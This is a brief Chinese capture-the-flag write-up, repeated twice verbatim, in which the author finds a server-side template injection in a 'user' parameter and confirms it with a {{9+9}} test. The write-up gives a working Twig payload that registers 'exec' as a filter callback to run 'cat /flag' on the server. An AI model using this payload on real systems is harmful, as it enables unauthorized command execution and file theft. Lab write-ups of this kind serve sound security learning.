既然提示了是和cookie有关系
那么先看cookie
没什么东西
然后去flag界面查看一下
发现多了一个user参数
这里存在注入
考虑可能是SSTI注入
尝试一下
123{{9+9}}
确实可以
存在twig模板注入
payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
既然提示了是和cookie有关系
那么先看cookie
没什么东西
然后去flag界面查看一下
发现多了一个user参数
这里存在注入
考虑可能是SSTI注入
尝试一下
123{{9+9}}
确实可以
存在twig模板注入
payload
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}